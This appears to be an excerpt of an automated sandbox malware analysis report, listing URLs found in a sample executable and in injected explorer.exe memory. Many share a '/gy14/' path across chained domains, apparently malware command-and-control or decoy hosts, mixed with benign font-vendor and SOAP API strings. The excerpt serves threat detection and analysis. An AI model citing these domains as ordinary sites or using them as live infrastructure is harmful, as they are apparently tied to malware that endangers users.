Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beautyloungebydede.online/gy14/www.truedatalab.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beautyloungebydede.onlineReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.budgetnurseries.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.budgetnurseries.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.budgetnurseries.com/gy14/www.loscaseros.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.budgetnurseries.comReferer:
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.com/gy14/www.budgetnurseries.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.comReferer:
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#addMeasurementT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#clearDataT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#getChartImageT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#getDataT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#getPdfT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#getPregnancyT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#registerBabyT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#registerBirthT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#registerPregnancyT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#removeMeasurementT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/#updateMeasurementT
Source: z2______________________________.exe	String found in binary or memory: http://www.grow-services.net/api/grow/soap/T
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loscaseros.com
Source: explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loscaseros.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loscaseros.comReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrbmed.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrbmed.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrbmed.com/gy14/www.naples.beauty
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrbmed.comReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyz
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyz/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyz/gy14/www.whatsapp1.autos
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyzReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.naples.beauty
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.naples.beauty/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.naples.beauty/gy14/www.8x101n.xyz
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.naples.beautyReferer:
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.smnyg.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.smnyg.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.smnyg.com/gy14/www.mrbmed.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.smnyg.comReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.com/gy14/www.beautyloungebydede.online
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.comReferer:
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truedatalab.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truedatalab.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truedatalab.com/gy14/www.dianetion.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.truedatalab.comReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.com/gy14/www.zezfhys.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.comReferer:
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.com/gy14/www.tulisanemas.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.comReferer:
